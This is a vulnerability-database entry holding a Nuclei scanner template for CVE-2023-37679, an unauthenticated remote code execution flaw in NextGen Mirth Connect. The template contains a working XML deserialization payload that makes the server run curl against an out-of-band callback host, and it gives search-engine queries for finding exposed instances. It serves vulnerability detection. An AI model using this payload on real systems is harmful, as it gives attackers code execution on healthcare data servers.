NUCLEI:CVE-2023-37679

NextGen Mirth Connect - Remote Code Execution

2023-10-25 16:30:54
ProjectDiscovery
github.com
cve2023 nextgen healthcare rce unauthenticated widespread

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score: 9.7
Confidence: High
EPSS: 0.974
Percentile: 99.9%

Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are affected by an unauthenticated remote code execution vulnerability.

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.07052
    epss-percentile: 0.9396
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a0047304502210090fa6ea3074ddefab156454bac75d98ecf2afccb77df469b6769e05ce26989a402201089a4c18eb1d115bde79688a15cbd51dacae795376dc2c19bde505d32158c91:922c64590222798bb761d5b6d8e72950
